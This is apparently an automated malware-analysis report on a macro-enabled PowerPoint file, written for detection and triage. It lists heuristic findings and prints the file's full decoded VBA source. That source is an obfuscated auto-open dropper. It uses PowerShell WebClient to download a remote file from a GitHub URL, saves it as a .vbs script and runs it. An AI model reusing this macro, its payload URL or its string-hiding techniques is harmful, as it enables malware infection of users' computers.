Verdict: MALICIOUS
Risk Score: 230

Heuristics (7)

- VBA project inside OOXML (medium; 5 related findings; OOXML_VBA): Document contains a VBA project — VBA macros present.
- VBA stages a PowerShell/LOLBin download-and-run command (critical; OLE_VBA_BITSTRANSFER_DROPPER): The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own. Matched line in script: `Sub auto_open()`
- Obfuscated auto-exec VBA loader (critical; OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set pMxjFuP = GetObject(baFhJMAOy())`
- GetObject call (high; OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set pMxjFuP = GetObject(baFhJMAOy())`
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Open macro (low; OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Sub auto_open()`
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg (in document text: OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3019 bytes | f8304c1e9a5e4a5614271a01446ce29cd146320197c958629af9be89be34a58f |
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 32768 bytes | 26306d7544a1f7d12e98bdbdd99c1c17a9e373081f0f27ca15c2aded6a73814c |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Módulo1"
Sub auto_open()
On Error Resume Next
boloteia = gbyDNiUmZV()
End Sub
Function DBKuOoh()
DBKuOoh = "hs" + "re"
End Function
Function gbyDNiUmZV()
'VBvPcFXclnCC = Array(kgUHXlR(QgjxziNx()), kgUHXlR(rnsQt()))
fd780 = Array("l", "le", DBKuOoh(), "wo", "P")
hgf8 = Join(fd780, "")
Dim lll As String
lll = "c"
unbmyajjzms = "(NEw-objE" & lll & "t " & "system.net.wEBclIenT).DownLoAdfIlE" & "( ”https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg” , ”$ENv:public\pandorinha.vbs” ) ; stARt-PRoCESs ”$ENv:public\pandorinha.vbs”"
'geTpUk (unbmyajjzms)
'qcydwyqnozj (kgUHXlR(hgf8) & Space(1) & a)
geTpUk (kgUHXlR(hgf8) & Space(1) & unbmyajjzms)
End Function
'=====================================================================
'Begin Code
Function kgUHXlR(w7df0sd)
Dim p
For p = Len(w7df0sd) To 1 Step -1
kgUHXlR = kgUHXlR & Mid(w7df0sd, p, 1)
Next
End Function
Sub geTpUk(twe70)
If 473708283 = 473708283 + 1 Then End
Dim bARdSPJbYuep As String
Set pMxjFuP = GetObject(baFhJMAOy())
pMxjFuP.Run twe70, 0
End Sub
Function AttzfJHm()
If 510001701 = 510001701 + 1 Then End
Dim XvZFokZtj As Double
AttzfJHm = GNufAJd(decrypt(Hex2Str("4533443B"), Hex2Str("33")) + decrypt(Hex2Str("3D4C4E3C384B383835414A4C4935"), Hex2Str("38")) + decrypt(Hex2Str("3347343430334946"), Hex2Str("33")) + decrypt(Hex2Str("38343D394A4B3C"), Hex2Str("37")) + decrypt(Hex2Str("393F4C407D6B74"), Hex2Str("36")))
End Function
Function baFhJMAOy()
If 118835736 = 118835736 + 1 Then End
Dim iDWQGl As String
baFhJMAOy = GNufAJd(decrypt(Hex2Str("4B394A413E4D4F3D39"), Hex2Str("39")) + decrypt(Hex2Str("4532322F3B4446432F32"), Hex2Str("32")) + decrypt(Hex2Str("4A373733364C493733"), Hex2Str("36")) + decrypt(Hex2Str("3333444536343A473B78666F"), Hex2Str("31")))
End Function
Function GNufAJd(w7df0sd)
Dim p
For p = Len(w7df0sd) To 1 Step -1
If 172023426 = 172023426 + 1 Then End
Dim QSTYgWCLLK As Currency
GNufAJd = GNufAJd & Mid(w7df0sd, p, 1)
Next
End Function
Public Function decrypt(strInput As String, second As Integer)
Dim first As Integer
For first = 1 To Len(strInput)
If 218466674 = 218466674 + 1 Then End
Dim QgIHX As Currency
Mid(strInput, first, 1) = Chr(Asc(Mid(strInput, first, 1)) - second)
Next first
If 340325665 = 340325665 + 1 Then End
Dim TKYiRREE As Integer
decrypt = strInput
End Function
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
On Local Error Resume Next
For second = 1 To Len(strData) Step 2
If 124270001 = 124270001 + 1 Then End
Dim XlHJScWA As Date
CryptString = CryptString & Chr$(Val("&H" & Mid$(strData, second, 2)))
Next second
If 567355800 = 567355800 + 1 Then End
Dim vbonEIKCbqi As Date
Hex2Str = CryptString
End Function
```